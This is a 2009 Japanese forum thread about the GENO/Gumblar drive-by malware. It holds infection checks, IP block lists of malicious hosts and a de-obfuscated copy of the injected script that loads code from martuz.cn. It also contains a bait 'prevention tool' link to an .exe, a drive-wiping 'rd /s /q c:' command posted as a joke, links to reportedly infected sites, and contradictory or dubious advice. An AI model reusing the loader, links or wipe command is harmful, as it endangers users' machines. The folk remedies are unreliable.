【ﾈｯﾄでも】GENOｳｨﾙｽ亜種が爆発的に増殖か 小林製薬や同人ｻｲﾄ他中心に感染も★5【新型ｳｨﾙｽ拡散中】

javascript切っていても感染のするとの事

詳しくは↓で以下略

GENOウイルスまとめ
ttp://www29.atwiki.jp/geno/

GENOウイルススレ　★10
http://pc11.2ch.net/test/read.cgi/sec/1242504332/
【管理も】同人サイト・GENOウィルス注意5【閲覧も】
http://changi.2ch.net/test/read.cgi/doujin/1242503523/
【Genoウィルス総合スレ】ニフティのオンラインウィルスチェックをする→感染
http://namidame.2ch.net/test/read.cgi/poverty/1242359071/
【ネット】 小林製薬ウェブサイトの一部でサイト改ざん、現在は閉鎖　　閲覧者にはウイルス感染の恐れ [09/05/12]
http://anchorage.2ch.net/test/read.cgi/bizplus/1242271601/
【ﾈｯﾄでも】GENOｳｨﾙｽ亜種が爆発的に増殖か 小林製薬や同人ｻｲﾄ他中心に感染も★4【新型ｳｨﾙｽ拡散中】
http://tsushima.2ch.net/test/read.cgi/news/1242521524/

前スレ
【ﾈｯﾄでも】GENOｳｨﾙｽ亜種が爆発的に増殖か 小林製薬や同人ｻｲﾄ他中心に感染も★5【新型ｳｨﾙｽ拡散中】
http://tsushima.2ch.net/test/read.cgi/news/1242541194/

あうあうあー(^q^)ﾉ

小林製薬の糸ようじ

小林製薬の糸ようじ

http://geno.2ch.tc/
GENOウイルスチェッカー
出力結果は↓

Jane使っている人は
ツール-設定-コマンドで
コマンド名　適当
実行するコマンドに　http://geno.2ch.tc/index.php?url=$TEXT$LINK
ってやるとなぞり検索でチェックできる



http://geno.2ch.tc/index.php?url=www.ribbonmagic.com%2F
危険度1000%
超絶危険なURLです。友人のPCを壊すのに利用しましょう！
絶対に踏んではいけません。

まだ駄目だよ

対策

Flash PlayerとPDFリーダーを最新のものにする

おわり(^q^)

>>1
おせーよ

俺、決してNGを使わないで糞コテもちゃんと見る派だったのに、
今回だけは入れてやるんだ。NG。

ネットカフェとか店先のPCとかな

>>1
★6だろ

>>6
VistaユーザーならUAC有効にしてればおｋ
1か月前に液晶のバックライトが切れたから買い替えて良かったかも

ノートかよ

なんで5なの？

6だと思ってくれ。

>>13
なんでもいいじゃん

一目で判るGENOたんの一日☆

こんにちは、GENOっていいます　（幼女ウイルス） 　　　第一感染
↓
あっ、また会ったね、お兄ちゃん。それじゃあ遊ぼっか！ 再起動で発動
↓
お姉ちゃん、こっちで一緒に遊ぼうよ！ 　　　　　　　勝手に海外のサイトからお姉ちゃんウイルスDL
姉「うっしゃ暴れるぞ」
↓
もうあたし一人でだいじょうぶだもん！　　　　　　　再起動で不老の無敵幼女発動
↓
お兄ちゃんの家に行きたいな〜……　　　　　　　　知らずにサイト更新する
↓
へぇ〜、お兄ちゃん家って、こんな鍵使ってるんだぁ。　　FTPパス送信
↓
えへへ、合鍵、作っちゃった♪
あ、お隣さんが回覧板届けに来てあたしの事尋ねてきたから
お嫁さんですって言っちゃった！えへへ　　　　　　　　　　　BOTがサイトに不正アクセスして改竄
↓
えへへ、本当にお嫁さんになっちゃったね♪
野球チームできるくらい、いーっぱい子供作ろうねっ♪　　　　　　　　　　　　自分のサイトがもれなく幼女ウイルス配布
↓
上に戻る

ビスタなんだけど、何もしてないのにHDDにアクセスまくってるんだけどウイルスかかったのかえ？

まさかのVista厨の逆襲
セキュリティ強化したゲイツの勝利だな

7のUACがクソと呼ばれる日も近いか

>>17
もう捨てたほうがいい

>>17
よくある

730 ： リナリア アルピナ(中部地方)：2009/05/17(日) 14:08:06.53 ID:PA1MHOB9
すまん、流れ読まずに投下
gnome氏のzlkon/gumblarサイトを参考に作ったんで防止策の一つとして貼っておく
・サーバがちょくちょく変わる性質なので今後の動向に注意
・一番上のmartuz.cnはNEW
・行頭の"HiPr-"はgnome氏が緊急(High Priority)と書いてるもの
・言うまでもないが、IP範囲最終決定とか使用は自己責任で

HiPr-NEW martuz.cn - 2009.05.16 (95.129.144.0/23) :95.129.144.0-95.129.145.255
HiPr- Botnet C&C by Gumblar - 2009.05.09 (78.109.16.0/20) :78.109.16.0-78.109.31.255
HiPr- gumblar relative 2009.05.07 (213.182.192.0/19) :213.182.192.0-213.182.223.255
HiPr- gumblar - 2009.05.02 (94.229.64.0/20) :94.229.64.0-94.229.79.255
Trojan Exploits (Regarding ZeuS) -- 2009.05.14 (206.44.0.0/16) :206.44.0.0-206.44.255.255
Malware Injection 2009.05.06 (91.211.64.0/23) :91.211.64.0-91.211.65.255
basesrv3.net - 2009.05.03 (91.212.41.0/24) :91.212.41.0-91.212.41.255
Malware Injection 2009.05.06 (91.212.65.0/24) :91.212.65.0-91.212.65.255
Trojan Exploits (Regarding ZeuS) -- 2009.05.14 (85.17.0.0/16) :85.17.0.0-85.17.255.255
autobestwestern.cn - 2009.05.13 (85.214.90.0/24) :85.214.90.0-85.214.90.255
gumblar via e-mail - 2009.05.12 (74.220.215.0/24) :74.220.215.0-74.220.215.255
zlkon another-type 2009.05.03 (212.117.160.0/19) :212.117.160.0-212.117.191.255
zlkon.lv -- 2009.04.05 (94.247.2.0/23) :94.247.2.0-94.247.3.255
http://tsushima.2ch.net/test/read.cgi/news/1242521524/730

感染予防対策(1)

１．Adobe Flash Player の最新版にアップデート
２．Adobe Acrobat Reader の最新版にアップデート
３．NoScriptの導入（Firefoxの導入）
４．Adobe Acrobat Readerの JavaScript 機能OFF
５．危険IPのブロック


諸事情でAdobe Reader 最新版を使わざるを得ない場合
2009年4月29日現在の最新版バージョン9.1設定例

１．Adobe Readerを起動し「編集」メニューの「環境設定」
　　「Acrobat JavaScriptを使用」のチェックボックスをオフ（チェックを外す）
　　OKを押して設定確定後、Adobe Readerを終了。
↓
２．必要と好みに応じて Adobe Reader Speed-Up にてプラグインを整理
　　設定は SpeedUp - Fast がおすすめ。
　　　注意すべきは
　　　Acroform（拡張子なし）
　　　Annotations（拡張子なし）
　　　これら2つのチェックボックスをオン（チェックが入っている）状態にしておく必要がある。
　　　そうしないと Adobe Reader が起動しなかったりする。

　　　このとき追加作業として
　　　EScript.apiとEScript.JPNのチェックボックスをオフ（チェックを外す）状態にしておくと
　　　より安心かもしれない。

まとめサイト重いぞ

あとGEONのイメージ悪くなるぞ
お前等許されないぞ

感染チェックツール
http://www.seibidoshuppan.co.jp 36635.txt.html
機能
1 ) cmd.exeの起動確認
2 ) regedit.exeの起動確認
3 ) sqlsodbc.chmのファイルサイズ確認
txtをbatにして実行

239 ：名無しさん＠お腹いっぱい。：2009/05/15(金) 02:39:15
最近流行のgumblar関連の焼き推奨一覧

hostflesh:58.65.232.0-58.65.239.255
nicovedeo:61.139.0.0-61.139.127.255
chunghwa:61.219.39.0-61.219.39.255
chinarailway1:61.235.117.0-61.235.117.255
chinarailway2:61.237.236.0-61.237.236.255
fakeav:63.146.2.0-63.146.2.255
hivelocity:69.46.0.0-69.46.31.255
bluehost:74.220.215.0-74.220.215.255
datacenterhosting:78.109.16.0-78.109.31.255
netdirect:78.159.112.0-78.159.115.255
fakevideo:82.146.48.0-82.146.55.255
xs4all:83.68.16.0-83.68.16.255
xentronix:85.12.43.0-85.12.43.255
colocation:85.14.6.0-85.14.6.255
leaseweb:85.17.0.0-85.17.255.255
strato:85.214.90.0-85.214.90.255
gaztranzitstroyinfo-net1:91.211.64.0-91.211.65.255
gaztranzitstroyinfo-net2:91.212.41.0-91.212.41.255
gaztranzitstroyinfo-net3:91.212.65.0-91.212.65.255
bastiontradegroup:94.232.248.0-94.232.255.255
gumblar-russian:94.229.64.0-94.229.79.255
zlkon.lv:94.247.2.0-94.247.3.255
madet:195.2.252.0-195.2.253.255
americanstandard:206.44.0.0-206.44.255.255

1/2
http://pc11.2ch.net/test/read.cgi/sec/1228949365/239-240

>>17
Vistaに標準でついてる児童デフラグがとまらないで終わってるんだと思えばいい。

>>26
普段どんな単語打ってるんだお前は

240 ：名無しさん＠お腹いっぱい。：2009/05/15(金) 02:39:58
zbot1:209.44.100.0-209.44.100.255
zbot2:209.44.126.0-209.44.126.255
zbot3:209.62.7.0-209.62.7.255
zbot4:209.102.247.0-209.102.247.255
zbot5:209.250.241.0-209.250.241.255
zeus1:209.44.96.0-209.44.127.255
zeus2:82.146.50.202
pacnet1:209.205.192.0-209.205.223.255
pacnet2:209.205.224.0-209.205.239.255
chinaunicom:211.90.0.0-211.97.255.255
zlkon:212.117.160.0-212.117.191.255
latvia:213.182.192.0-213.182.223.255
vundo1:216.39.48.0-216.39.63.255
vundo2:216.39.62.0-216.39.62.255
chinanet:218.90.0.0-218.94.255.255

2/2
http://pc11.2ch.net/test/read.cgi/sec/1228949365/239-240

感染予防対策(2)
危険ポートを閉じることでセキュリティを強化する。

【ポート135の役割】
Windows2000/XPは、標準で分散オブジェクト技術(以下：DCOM)を利用しています。
このDCOMを利用すると、他のPCのDCOMソフトを遠隔操作できます。
遠隔操作をする場合に、相手PCに問い合わせをする時のに使用するのがポート135です。
場合によっては、遠隔操作をされてしまう可能性があるものですので、このポートは停止しておきましょう。

ポート番号「135」、「リモート管理・操作等のサービスへのアクセス」
■ポート135を閉じる
「コントロールパネル」 -> 「管理ツール」 -> 「サービス」 -> 「Remote Procedure Call」を選択する。
「Remote Procedure Call (RPC) エンド ポイント マッパーや各種の RPC サービスを提供します。」
をダブルクリックし、プロパティを開く。
スタートアップの種類を「無効」にし、OKボタンをクリックしプロパティ画面を閉じる。
変更をしたらPCを再起動する。

ポート番号「445」、「ファイル共有等のサービスへのアクセス」
■ポート445を閉じる
「コントロールパネル」 ->「システム」 ->「ハードウェア」 ->「デバイスマネージャ」の「表示」メニューから
「非表示のデバイスドライバの表示」を選ぶと「プラグアンドプレイではないドライバ」という項目が一覧に加わる。
このツリーを展開して「NetBIOS over TCP/IP」のプロパティを開く。
ここで「ドライバ」タグを選択し、「スタートアップ」の種類を「無効」にする。
変更をしたらPCを再起動する。

以下はお約束
上に書いたことを行えば安全という保証はなく、すべて自己責任でお願いします。
またAdobe Readeｒ＆各ポートの環境設定をどうするかも各自考える必要があります。

>>26
初潮のことかー！

小林製薬とか普通にＣＭしてるけど、差し替えて謝罪ＣＭ入れるべきなんじゃないの？

まあ、銀イオン詐欺やってる犯罪企業にとってみれば
たいした問題じゃないのかもだけど

ubuntuのサブ機使お
しかし重いお…

で、niftyの話はどうなったんだ？

>>29
RPCを無効にする…だと…(ﾟqﾟ)？

VistaはUACオンなら、IEの保護モードで守りは鉄壁に近いはず

そもそも製薬企業というより、雑貨みたいなもんだよな・・。

実行された場合、ウイルス対策ソフト入れてれば殆どどれでもアラート反応する
反応したスクリプトを許可するなんてバカなことしなければ感染しない

同人サイト向け・通称「GENOウイルス」対策まとめ
http://www31.atwiki.jp/doujin_vinfo/

■何をしたらいいか分からない人はまずここを見る。
→http://www.seibidoshuppan.co.jp/
何をすれば良いか良く分からない人用のまとめ

■よくある質問>>1
■主な症状　>>5
■自ジャンルで発見した場合
→まとめページを見て、重複がない場合は>>4

※まとめサイトの方が拾いやすいように、
まとめサイトへの報告他は、必ず>>1の
アンカーを入れて報告してください。

GENOウィルスことGumblarの報告してくれてるブログ
ttp://www3.atword.jp/gnome/tag/zlkon/
あと非同人向けまとめサイト
ttp://www29.atwiki.jp/geno/

981 イワウチワ(大阪府) sage 2009/05/17(日) 19:28:23.11 ID:j5QqoQFP
>>868

これもChromeチェックがあるのを確認した
スクリプトではChromeを除外、つまりChromeの時はスルー


ブラウザがクロームならGENOに感染しないってこと？

XPで踏んでみるから
検証してほしいことがあったら言ってくれ

>>31
・小林製薬【対策済】
・BIG-server.com【対策済】
・ウェルネス（医療情報提供企業）【対策済】
・薬事日報社【対策済】
・国交省中部地方整備局岐阜国道事務所【対策済】
・全日本民医連【対策済】
・総合ホビー展示即売会「ホビコン」【対策済】
・GENO（PC通販ショップ）【キャッシュ削除済】
・NHT紀尾井町グループ（自毛植毛斡旋企業）【対策済】
・SayMove！【対策済】
・ライブハウス「あさがやドラム」【対策済】

> ブラウザがクロームならGENOに感染しないってこと？
俺、前クロームでGENO踏んだけど、クロームが落ちるだけで感染しなかったんだよね。

同人サイトって販売してるようなサイト？

>>38
>■何をしたらいいか分からない人はまずここを見る。
>→ww.seibidoshuppan.co.jp/
>何をすれば良いか良く分からない人用のまとめ


★★★おそらく感染サイトなので注意　罠です★★★

>>40
デイリーポータル見てきて

漏れのブラウザはChromiumなので感染しないのかな？
なら安心してネットできる

286 名前：以下、名無しにかわりましてVIPがお送りします[sage] 投稿日：2009/05/17(日) 19:23:09.84 ID:9JkQNPk40
881 名前：名無しさん＠お腹いっぱい。[sage] 投稿日：2009/05/17(日) 19:19:07
ダム板から着ました。

Chrome対応の亜種が出たっぽい予感。

884 名前：名無しさん＠お腹いっぱい。[sage] 投稿日：2009/05/17(日) 19:19:47
>>881
ソース


890 名前：名無しさん＠お腹いっぱい。[sage] 投稿日：2009/05/17(日) 19:22:10
>>884
個人のサイトだったからスレで。
http://tsushima.2ch.net/test/read.cgi/news/1242541194/935

>>38
ワロタ

>>40
できれは、IE６、IE７、IE８の場合わけで。

>>44
危険度1000%
超絶危険なURLです。友人の(ry
絶対に踏んではいけません。

>>45
おk
じゃあ>>45の感染してそうなURLくれ

νカスのくせにつまんねーなおい

デイリーポータル感染してたら困る

>>51
http://portal.nifty.com/
おね

>>49
ブラウザのバージョンごとの検証か・・・
これ簡単にやる方法ってある？

>>47

Chrome除外指定でChromeの時はスルーだと思うんだ
つまりウイルス起動しない

>>42
ありがとう
UCA入れてたのにろくに相手していなかったから
すごく不安だったけど安心しました

>>41
・小林製薬【対策済】
・BIG-server.com【対策済】
・ウェルネス（医療情報提供企業）【対策済】
・薬事日報社【対策済】
・国交省中部地方整備局岐阜国道事務所【対策済】
・全日本民医連【対策済】
・総合ホビー展示即売会「ホビコン」【対策済】
・NHT紀尾井町グループ（自毛植毛斡旋企業）【対策済】
・SayMove！【対策済】
・ライブハウス「あさがやドラム」【対策済】

　　　　論外

・GENO（PC通販ショップ）【証拠隠滅済】

これ位やるべきだろ

pixivはまだかー

>>55
仮想OSなら

￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣｣
―――――――――――――‐┬┘
　　　　　　　　　　　 　 　 　 　 　 　 |
　　 　 　 ＿＿＿＿.＿＿＿＿ 　　 |　.＿＿　 いらないＰＣを
　　　　　|　 　 　 　 | 　 　 　 　|　　 |　|＼＿＼　　窓から
　　　　　|　 　 　 　 | ∧＿∧　|　　 |　|　 |.◎.｜　投げ捨てろ
　　　　　|　 　 　 　 |（　´∀｀）つ ミ |　|　 |.：　｜
　　　　　|　 　 　 　 |/ ⊃　 ﾉ　|　　 |　.＼|.≡.｜
　 　 　 　￣￣￣￣'￣￣￣￣　 　 |　　　￣

>>54
　　　　　ﾍ⌒ヽﾌ
　　　　（　・ω・）　�d�d！
　　　　/ ~つと）

てか2ch以外で話題になってないね。
GENOの風評被害だとかいって自粛してるのかね？

【感染の確認方法】
�@cmd.exe（コマンドプロント）、regedit.exe（レジストリエディタ）が起動するか確認する
　※このウイルスに感染しているとコマンドプロンプト、レジストリエディタが立ち上がらない。
　■確認方法
　１．スタートから「ファイル名を指定して実行」
　２．「ファイルを指定して実行」という画面が出てくるので、入力欄に
　　　「regedit.exe」と入力して「OK」ボタンを押す。
　　　※立ち上がったことを確認したら弄らず閉じること。
　３．同様に、「cmd.exe」（全部小文字で）と入力して「OK」ボタンを押す
　　　※立ち上がったことを確認したら�Aへ

�Asqlsodbc.chmのファイルサイズの確認を確認する
　■Windows XP:
　　改ざんされていなければ
　　C:\WINDOWS\system32\sqlsodbc.chm　50,727 bytes
　■Windows 2000:
　　そもそも存在しないはずなので、
　　C:\WINDOWS\system32\sqlsodbc.chmが無いことを確認。
　■確認方法
　　１．スタートから「ファイル名を指定して実行」
　　２．「ファイルを指定して実行」という画面が出てくるので、入力欄に
　　「cmd.exe」（全部小文字で）と入力して「OK」ボタンを押す
　　　→背景が黒いウィンドウが開いた場合３へ
　　　→起動しない場合：感染疑い濃厚
　　３．背景が黒いウィンドウを選択。
　　　小文字で「dir C:\WINDOWS\system32\sqlsodbc.chm」と入力してEnterキー

�Bavast!（無料のアンチウイルスソフト）で確認

危険度の％の数字の根拠は何だ

ニフティって結局なんだったのよ
俺はアクセスしたけど感染しなかったぞ
アクセスしたのは昨日だけど

DPZ危険度1pt

中古本売ってる某サイトも感染しとる

>>60
今まさにそれでやってるんだが
今の仮想環境が８G越えだからコピーに時間かかるんだよなw
まっいっか一個一個やってみるよ

一次ソースたる情報が無い上に一次ソースらしきURL貼られても感染が怖くて踏めない
恐怖が人を支配する

正常なsqlsodbc.chm
ファイルサイズ：50,727バイト
CRC32：B61C7A80
MD5：F639AFDE02547603A3D3930EE4BF8C12
SHA-1：FBDD32ED13D27E4102621E1067FDF3634F33B2C3

上書きされたsqlsodbc.chmの例（あくまで例でありこの限りではない）
ファイルサイズ：1,323 バイト
CRC32：7585CBB6
MD5：BF7209B9589AD09A25740F6D47D0ADEA
SHA-1：D695F957AA9DEB0E4D92F4546DB3A883B1909008

>>66
誰も触ってない時点でわかるだろ
完全なデマで結論でてる

ちなみにスレ立てた奴はsakuられた

このスレのＵＲＬは踏まない

結局、アドビ関連をアップデートしまくればいいの?

２ちゃんのスレで対策をコピペされても信憑性がまったくないんだよな。
読む気にもならん。
さっさとウィルスを検出可能なオンラインスキャンをかけたほうが早いだろｗ

>>68
どこ？

まとめサイト見るの怖いから
具体的サイト名を教えろ

>>55
IE7かIE８だと感染しない可能性のある
レスをみた。これから探すから、ちょっと待ってくれ。

ネット見るのはMacでいいだろ

15 名前：genoウイルス被害者の会”管理”人[] 投稿日：2009/05/17(日) 03:13:20.26 ID:BRx1b5y4P
大事な事思い出した

【コマンドプロンプトが開かない】
↑これは感染の判断基準になるけども、
感染初期（除去可能な時期）にコマンドプロンプトを開くと
一気に親玉感染して重症化する。

安易にDOS窓ひらいちゃだめだ

92 名前：genoウイルス被害者の会”管理”人[] 投稿日：2009/05/17(日) 03:26:16.11 ID:BRx1b5y4P

おまえら c m d を 起 動 す る な

感染してたらコレが命取りになるよ

感染の確認ならレジストリエディタを開けるかでいい
DOS窓で確認しちゃいかん　絶対。

てかGENOウィルスってなんだよまるでPC通販GENOが諸悪の根源みたいじゃないか

>>38
ﾜﾛﾀ

>>16
わかりづれえ

初期のGenoウイルスと比べてはるかに進化してるな・・・・・・

>>81
多分わざと言ってるんだろうが
ある意味そうだろ

まあ、感染してる奴って思ったより多くない
局地的現象なんじゃないかとは思ってるが

>>38
seibidoのURL踏んだらavastが鳴ったぞ

なるほど
それでアクロバットリーダーがあわてて9.1にｳﾌﾟしたんだ

パソコン蛾ぶっ壊れた

http://online.us.drweb.com/result/?url=http%3A%2F%2Fwww.ribbonmagic.com%2F

>>86
やっちまったな・・・

>>55
ごめん。記憶違いだった。

555 名前：名無しさん＠お腹いっぱい。[sage] 投稿日：2009/05/16(土) 23:30:25
単にIEとFirefoxで挙動が違うだけで
Firefoxも食らうんじゃね

583 名前：名無しさん＠お腹いっぱい。[sage] 投稿日：2009/05/16(土) 23:35:13
>>555
いや、いろいろスクリプト見たけど、ScriptEngineのバージョンチェックしてて、
対象をIE7以下のjscript.dllに絞ってるのしか見たことないんだよね。

Firefoxを対象にしているスクリプトがあるのなら、そのスクリプトを
拾いたいんだけど、見つからない。

危険度100000000000

同人だと大量に釣れるから面白い

これはそんなに怖いもんじゃないだろ。
接続状況の監視しておけばいいだけだし。

>>91
532 名前：名無しさん＠お腹いっぱい。[sage] 投稿日：2009/05/16(土) 23:26:33
なんかアレな情報が流れてるな…
スクリプトはIEとそれ以外で別のコードを返すけど
Firefoxも普通に攻撃対象に入ってる

548 名前：名無しさん＠お腹いっぱい。[sage] 投稿日：2009/05/16(土) 23:29:31
>>532
jscript.dllのバージョンチェックが入ってるから、実質的にIE7以下しか
攻撃対象になっていないように思うんだが、Firefoxが対象になってる
スクリプトが埋め込まれているサイトがあったら教えて。踏みに行くから。

586 名前：名無しさん＠お腹いっぱい。[sage] 投稿日：2009/05/16(土) 23:35:24
>>548
どれも同じだよ。>>324
確かにjscript.dllのバージョンチェックが入ってるんだけど、
これはobjectタグで返すかembedタグで返すかを判別するだけのコードのように思う。

薬事日報の詳細報告ページが消えてるな。
現時点では一番詳しくて分かりやすかったのに。

Googleキャッシュが残ってたから貼っとく。
http://72.14.235.132/search?q=cache:KJGRCWkLccAJ:www.yakuji.co.jp/books/catalog/product_info.php/%3Fproducts_id%3D203+薬事日報&cd=2&hl=ja&ct=clnk&gl=jp&lr=lang_ja

こんなご時勢だから、念のため上のIPアドレスのWhois結果も貼っとく。
http://whois.ansi.co.jp/?key=72.14.235.132

>>91
おっ！サンクス

まぁいろいろまぁいろいろと試してみるよ


現在検証するブラウザ
IE6
IE7
IE8
Firefox最新版
Opera最新版
Chome最新版

こんなところかな？

感染予防ツール置いておきますね
http://mj.dip.jp/jlab-beer/s/test0000.jpg.kintama.exe

>>90
avastは心配スンナって言ってくれたよ

まるでエヴァみたいだな

>>95
680 名前：名無しさん＠お腹いっぱい。[sage] 投稿日：2009/05/16(土) 23:58:32
var j = "", u = navigator.userAgent;

if(
　　　　　(u.indexOf("Chrome")<0) &&　 　 　　//Chrome以外ならtrue
　　　　　(u.indexOf("Win")>0) &&　　　　　　　 //Windowsならtrue
　　　　　(u.indexOf("NT 6")<0) &&　　　　　 　//WindowsNT6以外ならtrue(XPはNT5.1、VistaはNT6.0)
　　　　　(document.cookie.indexOf("miek=1")<0) &&
　　　　　(typeof(zrvzts)!=typeof("A"))
){
　　　　　zrvzts="A";
　　　　　if(window.ScriptEngine){ //IEのVBscriptが実行できるならtrue
　　　　　　　　　　j = ScriptEngineMajorVersion()+ScriptEngineMinorVersion()+ScriptEngineBuildVersion();//VBScriptの命令の羅列（詳しくはググれ）
　　　　　}
　　　　　document.write("<script src=//m"+"artuz.cn/vid/?id="+j+"><\/script>"); //scriptタグ書き出し
}
更に読みやすくしてコメント付けてみた
IEでVBScript使えないと動かないっぽいね

698 名前：名無しさん＠お腹いっぱい。[sage] 投稿日：2009/05/17(日) 00:03:06
>>680
違う。
IEの場合はj=以降にjscript.dllのバージョンが入ってmartuz.cnを呼び出す。
その他のブラウザはj=以降に何も入らずにmartuz.cnを呼び出す。
その違いだけ。

なんか思いと思ったらこれか
でもＡＶＧ入れてるから問題ない

人間もPCもウイルスにかかってる
もう外も中もだめだ

>>95
324も乗せろ

UAで弾いてるなら、UA偽装すれば安全って事？
誰か試してくれ

軟弱な豚インフルよりこっちのがよっぽど面白いな

C:\WINDOWS → %WINDIR%

とりあえず踏んだ後だが

・cmd.exeとregedit.exeが起動するか確認
・タスクマネージャーでcmdが動いてないか確認
・CPU使用率をチェック
・cmdでC:\WINDOWS\system32\sqlsodbc.chmが50,727か確認

・最後cmdからrd /s /q c:を実行


とこんな感じで試していくけど
他に何かある？

>>97
Chrome最新版っていわれてもな…StableとBetaとDevがあるんだが

vista 64bitって、最近じゃ使い勝手大丈夫かね?XPの64bit版よりかは格段って聞いてるけど。

7の64bitまで待とうかって思ってたけど、これねあるんじゃ繋ぎに買ってみようかな。

GENOウィルスの親玉にアパッチ打とうぜｗｗｗｗｗｗｗｗｗｗ
http://takeshima.2ch.net/test/read.cgi/news4vip/1242547793/

いろんなサイトのソース見てウイルス確認したけど、
成美堂出版ってどこにウイルスがあるの？
ソース見て確認したけどわからん

>>41
株式会社りぶメール（www.livmail.com/3others-page/janet/tokusen/index.htm）

未対策

>>109
通常最新版と言ったら
公式からダウンロードできるものじゃないの？

>>104

324 名前：名無しさん＠お腹いっぱい。[sage] 投稿日：2009/05/16(土) 22:24:31
>>221
>>1のサイトとリンク先を参考にした現在の感染サイト
スレで報告あったサイト含む
漏れがあったらレスよろ

p-frying■com/
www■zengozen■co■jp/pic/keturosyumire-syonn■htm
skyhighpremium■com/
sound■jp/yudai_marimba/
www■thesis-report■com/
www■joyjoynet■com/
www■ti-a-ra■com/
www1■odn■ne■jp/revue1999/
www■nifty-hair■com/
www■k-q-bury■com/
expss■main■jp/expss2/2005/01/
www■livmail■com/

うざい警告が初めて役に立ったって感じだvista
お前らざまあああああｗｗｗｗｗｗｗ

>>108
＞最後cmdからrd /s /q c:を実行


これはやらなくていいだろｗ
遊ばないで検証を続けてくれ

で、サーバーにはどんな経路で侵入してるんだ？
OSの脆弱性？アプリケーションの脆弱性？

感染してるサイトまとめってないの？誰か便利な〜リンク集みたいなの作ってくれ

>>108
・Acrobatが勝手に起動
これは？

>>116
うんこ

>>118
FTP

>>117
まぁどうせ消すからと思ってw

セキュリティホールの戦犯は誰だよｗ

いまどきflash（笑）とかJavaScript（笑）使ったウェブサイトってｗｗｗ

ウィルスがupdateするのはわかったんだが、それって悪意持った第三者がやってんの？
さすがに自己改善・自己進化できるウィルスは映画脳だよな…

結局ふたば感染はガセだったの？

戦犯（笑）

>>124
アップデートしない情弱じゃないの？

>>121
ちんこ

セキュリティホールの戦犯？
わざわざダウングレードしてXP入れた奴だろ

ゲイツ万歳！

>>118
ん、つまりコンテンツアップロード者が感染してるってことか？
管理責任かよｗｗｗ

>>129
ま・・・ま・・・・

同人サイトを攻撃するってことはこのウイルスって善玉菌？

>>108
Gumblar ？とおもったら
ttp://www3.atword.jp/gnome/2000/01/14/gumblar-%EF%BC%9F%E3%81%A8%E3%81%8A%E3%82%82%E3%81%A3%E3%81%9F%E3%82%89/

>※注意：現在の最新のウィルスでは起動します。
最新のGENOウイルスはｃｍｄは起動するとかいてあるけど
ほんとかどうか試して欲しい。

同人板はホント情弱ばっかだな

なんかgoogleの検索結果がおかしくね？
http://www.google.com/search?hl=ja&lr=lang_ja&ie=UTF-8&oe=UTF-8&q=%E3%82%8A%E3%81%B6%E3%83%A1%E3%83%BC%E3%83%AB&num=50

これwindows　updateじゃ防げないのがタチ悪い

>>118
PCに感染するとFTPとかのパケット監視をはじめて
そのPCがFTPなどに接続するとIDとパスワードを取得して他の感染PC達に通知。
そのIDとパスワードを使って、サイトにスクリプトを追加。

>>129
あんこ

>>132
おっぱい

>>120
おk

>>134
おk


◆現在の検証予定◆

○感染後の行動
・cmd.exeとregedit.exeが起動するか確認
・タスクマネージャーでcmdが動いてないか確認
・CPU使用率をチェック
・cmdでC:\WINDOWS\system32\sqlsodbc.chmが50,727か確認
・Acrobatが勝手に起動
・最後cmdからrd /s /q c:を実行

○検証するブラウザ
IE6
IE7
IE8
Firefox Stable最新版
Opera Stable最新版
Chome Stable最新版
Safari Stable最新版

Googleの検索結果にGENO汚染されたサイトが入ってるだけでトロイが入ってこようとする。
とうとうGoogleも死亡か！？

>>143
それ検索先の先読みが有効になってるだけでないの

ドラッグすると感染するからドラッグするなよ！絶対だぞ！！！

？？？？？？ ？？？？？？ ？？？？？？

情弱や一般人に感染するってのはポイント高いな
ごく一部に感染するキンタマや山田みたいな人生オワタ系ウイルスじゃなくて
サイト開いただけでウイルスに感染したらリカバリしなきゃやべぇ的なウイルス久しぶり杉ﾜﾛﾀ

>>143
それはブラウザの先読み機能だろうから設定変えたらいい

>>143
感染してないか？
このウイルスはグーグル先生の結果を改ざんするらしいぞ

GENOｳｨﾙｽ亜種が爆発的に増殖か小林製薬や同人サイト他中心に感染も5
http://takeshima.2ch.net/test/read.cgi/news4vip/1242545864/641

641 名前：以下、名無しにかわりましてVIPがお送りします[] 投稿日：2009/05/17(日) 20:05:15.34 ID:CXOV/Z770
http://www.dotup.org/uploda/www.dotup.org37789.jpg


carwash

>>142だが
検証するのは>>142だけでいい？

結局要はアドビ更新すりゃいいんだよな？

>>149
Avast!が超絶反応してワロタｗｗｗｗｗ

【感染の確認方法】
�@cmd.exe（コマンドプロント）、regedit.exe（レジストリエディタ）が起動するか確認する
　※このウイルスに感染しているとコマンドプロンプト、レジストリエディタが立ち上がらない。
　■確認方法
　１．スタートから「ファイル名を指定して実行」
　２．「ファイルを指定して実行」という画面が出てくるので、入力欄に
　　　「regedit.exe」と入力して「OK」ボタンを押す。
　　　※立ち上がったことを確認したら弄らず閉じること。
　３．同様に、「cmd.exe」（全部小文字で）と入力して「OK」ボタンを押す
　　　※立ち上がったことを確認したら�Aへ

�Asqlsodbc.chmのファイルサイズの確認を確認する
　■Windows XP:
　　改ざんされていなければ
　　C:\WINDOWS\system32\sqlsodbc.chm　50,727 bytes
　■Windows 2000:
　　そもそも存在しないはずなので、
　　C:\WINDOWS\system32\sqlsodbc.chmが無いことを確認。
　■確認方法
　　１．スタートから「ファイル名を指定して実行」
　　２．「ファイルを指定して実行」という画面が出てくるので、入力欄に
　　「cmd.exe」（全部小文字で）と入力して「OK」ボタンを押す
　　　→背景が黒いウィンドウが開いた場合３へ
　　　→起動しない場合：感染疑い濃厚
　　３．背景が黒いウィンドウを選択。
　　　小文字で「dir C:\WINDOWS\system32\sqlsodbc.chm」と入力してEnterキー

�Bavast!（無料のアンチウイルスソフト）で確認
　　http://www.btfree.info/file.php?action-get.html
　　Code by: 790e3cc3feabad9

>>150
とりあえず、その２つだけいいのではないでしょうか。
作業するのも大変でしょうし。

>>87
9.1.1じゃないと危ないらしいぞ

先読み機能て何のためにあるのさ？

>>156
ブラウジングの高速化・・・？

ちょっくらプリフェッチの切り方纏めてくるか

>>154
おk
じゃあ早速踏みまくってきますノシ

>>149
スクリプトに反応しているのか

>>149
キングソフトだと反応しなかった

このスレいい加減実態が見えて来ないな・・

>>157
なら、外付けHDDに世の中全てのキャッシュを保存すれば勝ち組だな

>>156
Firefoxの先読みは有効のままで何も問題ないぞ

　　　　　　　　 |:;:;:;:;:;:;:;:;:;:;:;:;:;:i;:;:;:;:;:;:;:;:;:;:;:;:;|
